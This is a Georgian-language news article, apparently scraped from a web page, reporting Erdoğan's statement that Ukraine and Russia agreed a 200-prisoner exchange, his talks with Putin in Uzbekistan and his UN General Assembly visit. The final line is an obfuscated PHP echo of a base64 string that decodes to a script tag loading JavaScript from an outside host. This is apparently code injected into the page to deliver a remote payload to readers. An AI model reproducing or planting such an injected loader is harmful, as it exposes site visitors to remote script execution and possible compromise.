celsiusi
ავერსი საქკაბელი
თურქეთის პრეზიდენტი რეჯეფ თაიფ ერდოღანი აცხადებს, რომ მიღწეულია შეთანხმება უკრაინასა და რუსეთს შორის 200 ტყვეს გაცვლის შესახებ. როგორც თურქული სააგენტო „ანადოლუ“ წერს, ამის შესახებ ერდოღანმა ამერიკულ ტელეკომპანია PBS-თან ინტერვიუში განაცხადა.
 
თურქეთის პრეზიდენტი მიღწეულ შეთანხმებას ძალიან მნიშვნელოვან ნაბიჯად აფასებს. მისი თქმით, თურქეთი მუშაობს კიევსა და მოსკოვს შორის ტყვეების კრიზისის გადასაჭრელად ორ ქვეყანას შორის დაძაბულობის დეესკალაციისთვის.
 
„ახლა ჩვენ ვმუშაობთ ტყვეების კრიზისის გადასაჭრელად. ჩვენ ნაბიჯებს ვდგამთ და გარკვეულ ეტაპს მივაღწიეთ. მეორე მხრივ, ჩვენ გადავდგით ნაბიჯები მარცვლეულის დერეფანთან დაკავშირებით“, – განაცხადა ერდოღანმა ინტერვიუში.
 
მისი თქმით, უზბეკეთში ვიზიტისას მას რუსეთის პრეზიდენტთან ჰქონდა შეხვედრები.
 
„მე მქონდა სიღრმისეული შეხვედრები პუტინთან უზბეკეთში. მე გავაცნობიერე, რომ ისინი სინამდვილეში ცდილობენ, დაასრულონ ეს რაც შეიძლება მალე. მაგალითად, ამ ეტაპზე მიღწეულია შეთანხმება 200 ტყვეს გაცვლასთან დაკავშირებით. ეს არის კარგი განვითარება, რადგან ამით გადაიდგა ძალიან მნიშვნელოვანი ნაბიჯი. ამჟამად მაღალჩინოსნები ამ საკითხის ტექნიკურ ნაწილს აგვარებენ“, – განაცხადა ერდოღანმა.
 
როგორც თურქეთის პრეზიდენტმა აღნიშნა, პუტინსაც და ზელენსკისაც განუცხადა, რომ ომში გამარჯვებული არავინ არის. მისი თქმით, ომის დაწყებისთანავე, თურქეთი მისდევს დაბალანსებულ პოლიტიკას რუსეთსა და უკრაინასთან მიმართებით.
 
თურქეთის პრეზიდენტი რეჯეფ თაიფ ერდოღანი ამჟამად ნიუ იორკში იმყოფება, სადაც ის გაერო-ს გენერალური ასამბლეის 77-ე სესიაში მონაწილეობს.
437
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");